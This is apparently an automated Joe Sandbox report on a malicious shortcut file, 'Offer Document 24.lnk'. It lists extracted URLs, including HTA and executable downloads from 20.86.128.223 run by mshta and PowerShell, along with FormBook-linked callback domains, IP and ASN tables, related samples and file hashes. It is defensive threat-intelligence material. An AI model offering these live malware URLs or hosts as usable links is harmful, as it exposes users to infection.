                                                http://20.86.128.223/room/room4.htaomshta.exe, 00000003.00000003.1489347883.00000237E12E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E12DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E12E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 0000000A.00000002.3839549764.00000000043C2000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000003642000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/room4.htatmshta.exe, 00000003.00000002.1490061483.00000237E12C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489534888.00000237E12C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 0000000A.00000002.3839549764.00000000043C2000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000003642000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/rooma.exeppowershell.exe, 00000005.00000002.1443968216.0000021E64339000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/roompowershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/rooma.powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.1powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://contoso.com/Licensepowershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://20.86.128.223/room/room4.hta$mshta.exe, 00000003.00000002.1490061483.00000237E12C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489534888.00000237E12C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/ropowershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 0000000A.00000002.3842370308.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3839549764.000000000409E000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.000000000331E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/roopowershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/ropowershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/room4.htaventindowsINetCookiesIOmshta.exe, 00000003.00000003.1486769366.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1489347883.00000237E1315000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E1315000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://contoso.com/powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://20.86.128.223/room/room4.htaHmshta.exe, 00000003.00000002.1489900922.00000237E1230000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.joyesi.xyzTmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3837430947.00000000023EE000.00000040.80000000.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/room4.hta....=Hmshta.exe, 00000003.00000003.1487536110.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490295950.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.2powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1443968216.0000021E65BDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1456650933.0000021E74180000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.goldenjade-travel.com/fo8o/?kzN4Y=k0xDPL&amp;Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prInetbtugc.exe, 0000000A.00000002.3839549764.0000000003BE8000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000002E68000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/roompowershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/roomapowershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/rpowershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.sedo.com/services/parking.php3netbtugc.exe, 0000000A.00000002.3842370308.0000000005DD0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3839549764.000000000409E000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.000000000331E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://g.live.com/odclientsettings/Prod/C:edb.log.8.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://20.86.128.223/room/rpowershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://donnavariedades.com/fo8o?Plm0mn68=lnetbtugc.exe, 0000000A.00000002.3839549764.00000000046E6000.00000004.10000000.00040000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3838643942.0000000003966000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/room4.htaC:mshta.exe, 00000003.00000002.1490037381.00000237E12A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/rooma.expowershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128powershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/room4.htastrictedmshta.exe, 00000003.00000002.1490103800.00000237E1315000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/roopowershell.exe, 00000005.00000002.1443968216.0000021E65474000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://20.86.128.223/room/room4.hta4.C:mshta.exe, 00000003.00000003.1487536110.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490295950.00000237E135D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E135D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://aka.ms/pscore68powershell.exe, 00000005.00000002.1443968216.0000021E64111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 0000000A.00000002.3842765739.0000000007885000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://20.86.128.223/room/room4.hta;Hmshta.exe, 00000003.00000003.1489347883.00000237E12E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1486769366.00000237E12DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1490103800.00000237E12E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                91.195.240.94
                                                www.rssnewscast.comGermany
                                                47846SEDO-ASDEfalse
                                                185.237.107.49
                                                www.joyesi.xyzUkraine
                                                56421UA-WEECOMI-ASUAtrue
                                                34.111.148.214
                                                www.660danm.topUnited States
                                                15169GOOGLEUSfalse
                                                116.50.37.244
                                                www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                23.227.38.74
                                                shops.myshopify.comCanada
                                                13335CLOUDFLARENETUSfalse
                                                85.159.66.93
                                                natroredirect.natrocdn.comTurkey
                                                34619CIZGITRfalse
                                                202.172.28.202
                                                www.kasegitai.tokyoJapan37907DIGIROCKDigiRockIncJPfalse
                                                66.29.149.46
                                                www.techchains.infoUnited States
                                                19538ADVANTAGECOMUSfalse
                                                154.215.72.110
                                                www.3xfootball.comSeychelles
                                                132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                195.110.124.133
                                                elettrosistemista.zipItaly
                                                39729REGISTER-ASITfalse
                                                46.30.213.191
                                                www.antonio-vivaldi.mobiDenmark
                                                51468ONECOMDKfalse
                                                20.86.128.223
                                                unknownUnited States
                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                217.196.55.202
                                                empowermedeco.comNorway
                                                29300AS-DIRECTCONNECTNOfalse
                                                IP
                                                127.0.0.1
                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1446727
                                                Start date and time:2024-05-23 20:19:17 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 10m 48s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:18
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:Offer Document 24.lnk
                                                Detection:MAL
                                                Classification:mal100.rans.troj.spyw.evad.winLNK@14/15@17/14
                                                EGA Information:
                                                • Successful, ratio: 60%
                                                HCA Information:
                                                • Successful, ratio: 94%
                                                • Number of executed functions: 87
                                                • Number of non-executed functions: 254
                                                Cookbook Comments:
                                                • Found application associated with file extension: .lnk
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.43.61.160
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target TmjHHkXnMrncRmISMzN.exe, PID 4472 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 7388 because it is empty
                                                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: Offer Document 24.lnk
                                                TimeTypeDescription
                                                14:20:13API Interceptor32x Sleep call for process: powershell.exe modified
                                                14:20:20API Interceptor3x Sleep call for process: svchost.exe modified
                                                14:21:10API Interceptor10992740x Sleep call for process: netbtugc.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                91.195.240.94Ordin de plat#U0103.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • www.petrojetclub.com/q0kk/
                                                YPR010098- Quote- PFI.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • www.winhgx.com/u88q/
                                                PO_INdllc0987633.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • www.winhgx.com/u88q/
                                                o8JSCMaz7d.exeGet hashmaliciousFormBookBrowse
                                                • www.rssnewscast.com/fo8o/
                                                Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                • www.rssnewscast.com/fo8o/?FBEd=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo8oWpH62KBeZ0RVxT0MiM3+/B0IJ8Q==&4h8=YPQX8Tch
                                                SHIPMT-97 6533 1936ROBUTECH.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • www.winhgx.com/u88q/
                                                BE.exeGet hashmaliciousFormBookBrowse
                                                • www.5597043.com/nrup/
                                                Arrival Notice.docGet hashmaliciousFormBookBrowse
                                                • www.5597043.com/nrup/
                                                SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtfGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • www.5597043.com/nrup/
                                                150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                • www.rssnewscast.com/fo8o/
                                                185.237.107.49o8JSCMaz7d.exeGet hashmaliciousFormBookBrowse
                                                  Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                    150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                      SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                        DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                          116.50.37.244o8JSCMaz7d.exeGet hashmaliciousFormBookBrowse
                                                          • www.goldenjade-travel.com/fo8o/
                                                          Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                          • www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwnciuyQsy8w1cq+9C58fB3trEND4VQ==
                                                          150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                          • www.goldenjade-travel.com/fo8o/
                                                          SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                          • www.goldenjade-travel.com/fo8o/
                                                          DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                          • www.goldenjade-travel.com/fo8o/
                                                          DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                          • www.goldenjade-travel.com/fo8o/
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          www.joyesi.xyzo8JSCMaz7d.exeGet hashmaliciousFormBookBrowse
                                                          • 185.237.107.49
                                                          Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                          • 185.237.107.49
                                                          150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                          • 185.237.107.49
                                                          SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                          • 185.237.107.49
                                                          DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                          • 185.237.107.49
                                                          Product_Specs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 185.237.107.49
                                                          natroredirect.natrocdn.como8JSCMaz7d.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          narud#U017ebenicu 0BH2024.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          Swift Message.pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          Apexes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 85.159.66.93
                                                          Yolk.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 85.159.66.93
                                                          www.kasegitai.tokyoo8JSCMaz7d.exeGet hashmaliciousFormBookBrowse
                                                          • 202.172.28.202
                                                          Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                          • 202.172.28.202
                                                          150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                          • 202.172.28.202
                                                          SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                          • 202.172.28.202
                                                          DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                          • 202.172.28.202
                                                          DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                          • 202.172.28.202
                                                          New_Order.exeGet hashmaliciousFormBookBrowse
                                                          • 202.172.28.202
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • 202.172.28.202
                                                          TERMS.docGet hashmaliciousUnknownBrowse
                                                          • 202.172.28.202
                                                          shops.myshopify.comw5c8CHID77.exeGet hashmaliciousUnknownBrowse
                                                          • 23.227.38.74
                                                          http://arjunmkt.github.io/publicGet hashmaliciousUnknownBrowse
                                                          • 23.227.38.74
                                                          (SO.5649) PO-54219 54224 54226 54229 EXPORT.PDF.scr.exeGet hashmaliciousFormBookBrowse
                                                          • 23.227.38.74
                                                          https://patriotbarbie.com/Get hashmaliciousUnknownBrowse
                                                          • 23.227.38.74
                                                          http://salecinask.liveGet hashmaliciousUnknownBrowse
                                                          • 23.227.38.74
                                                          Liste d'inventaire.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 23.227.38.74
                                                          P240842_P240843.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 23.227.38.74
                                                          Wd2pJD5c7x.exeGet hashmaliciousFormBookBrowse
                                                          • 23.227.38.74
                                                          Transaction advice.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 23.227.38.74
                                                          narud#U017ebenicu 018BH2024.exeGet hashmaliciousFormBookBrowse
                                                          • 23.227.38.74
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          DONGFONG-TWDongFongTechnologyCoLtdTWeyKGju2MU8.elfGet hashmaliciousMiraiBrowse
                                                          • 119.15.228.117
                                                          JvULMWY21C.elfGet hashmaliciousUnknownBrowse
                                                          • 119.15.228.101
                                                          o8JSCMaz7d.exeGet hashmaliciousFormBookBrowse
                                                          • 116.50.37.244
                                                          Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                          • 116.50.37.244
                                                          150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                          • 116.50.37.244
                                                          SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                          • 116.50.37.244
                                                          DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                          • 116.50.37.244
                                                          DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                          • 116.50.37.244
                                                          4eGsl7kZ8Y.elfGet hashmaliciousMiraiBrowse
                                                          • 116.50.38.9
                                                          Iq9FbxpCn8.elfGet hashmaliciousUnknownBrowse
                                                          • 101.0.250.121
                                                          CIZGITRfile.exeGet hashmaliciousUnknownBrowse
                                                          • 89.19.30.89
                                                          https://erzincanaktastaksi.com/20/w2_2023_Up.zipGet hashmaliciousXWormBrowse
                                                          • 94.73.146.114
                                                          o8JSCMaz7d.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          z8s945rPmZ.exeGet hashmaliciousSystemBCBrowse
                                                          • 94.73.188.14
                                                          150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                          • 85.159.66.93
                                                          XFJxqIEFFQ.elfGet hashmaliciousMiraiBrowse
                                                          • 94.73.136.4
                                                          UA-WEECOMI-ASUAo8JSCMaz7d.exeGet hashmaliciousFormBookBrowse
                                                          • 185.237.107.49
                                                          Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                          • 185.237.107.49
                                                          150-425-2024.exeGet hashmaliciousFormBookBrowse
                                                          • 185.237.107.49
                                                          SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                          • 185.237.107.49
                                                          DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                          • 185.237.107.49
                                                          SEDO-ASDEPlatosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 91.195.240.19
                                                          FRA.0038222.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 91.195.240.123
                                                          ShippingDoc_23052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 91.195.240.19
                                                          Forfaldendes253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 91.195.240.123
                                                          GXu0Ow8T1h.exeGet hashmaliciousFormBookBrowse
                                                          • 91.195.240.19
                                                          file.exeGet hashmaliciousCMSBruteBrowse
                                                          • 91.195.240.12
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • 91.195.241.232
                                                          FRA.0038253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 91.195.240.123
                                                          FRA.0038253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 91.195.240.123
                                                          waybillDoc_20052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 91.195.240.19
                                                          CLOUDFLARENETUShttps://freexxxth.linkGet hashmaliciousUnknownBrowse
                                                          • 104.21.25.77
                                                          https://freexxxth.linkGet hashmaliciousUnknownBrowse
                                                          • 172.67.223.248
                                                          SCB REmittance Advice.docGet hashmaliciousLokibotBrowse
                                                          • 188.114.97.9
                                                          V_273686.Lnk.lnkGet hashmaliciousMalLnkBrowse
                                                          • 172.67.217.192
                                                          kam.cmdGet hashmaliciousGuLoaderBrowse
                                                          • 104.21.28.80
                                                          https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1Get hashmaliciousUnknownBrowse
                                                          • 104.21.39.66
                                                          https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4Get hashmaliciousHTMLPhisherBrowse
                                                          • 172.64.154.146
                                                          http://all4promos.comGet hashmaliciousUnknownBrowse
                                                          • 162.247.243.29
                                                          Doc0781123608.exeGet hashmaliciousAgentTesla, PureLog Stealer, XWormBrowse
                                                          • 172.67.74.152
                                                          nv6mqExGOo.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                          • 104.26.0.5
                                                          No context
                                                          No context
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8192
                                                          Entropy (8bit):0.35999246155449205
                                                          Encrypted:false
                                                          SSDEEP:6:6xDoaaD0JOCEfMuaaD0JOCEfMKQmDMxDoaaD0JOCEfMuaaD0JOCEfMKQmD:haaD0JcaaD0JwQQnaaD0JcaaD0JwQQ
                                                          MD5:D6D3830984AEC72B32E4EF5030B32290
                                                          SHA1:A645195729EB557B4B773E137AA78ECB17CFB96D
                                                          SHA-256:09BA30C4D4F2F7FEC3C62A7AD0D5103CE6662FDAB91F62803144CCB6B20E4604
                                                          SHA-512:44C27B21C2BB77D57AC1499ABFEB4FA11B45A7EC856276696132498302733B88EE7D748E05ABD6DAC09C8A478CCC803F16A8E1FF7305245F82E382D2617AA69F
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:*.>...........~.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................~.............................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1310720
                                                          Entropy (8bit):0.8063020163092813
                                                          Encrypted:false
                                                          SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAh:RJE+Lfki1GjHwU/+vVhWqpc
                                                          MD5:274720DB90AD80CFFE7D519F9EF7EF7C
                                                          SHA1:D30EB14D9959C96C2C7708EBEBA83DA4D60AB864
                                                          SHA-256:ADE0A31DF34C50A638D949C26D7B09A64326AF091936DAF80AD4362FCC69C819
                                                          SHA-512:1C6A2CBA606C654C29302C793FC655A647EB3C055AA8C187B8FBCA6EE9E731AFA08868FF40D23A4B6BFF7C7186AD8E8C3D330B1F697641CEB3972E1E31486E09
                                                          Malicious:false
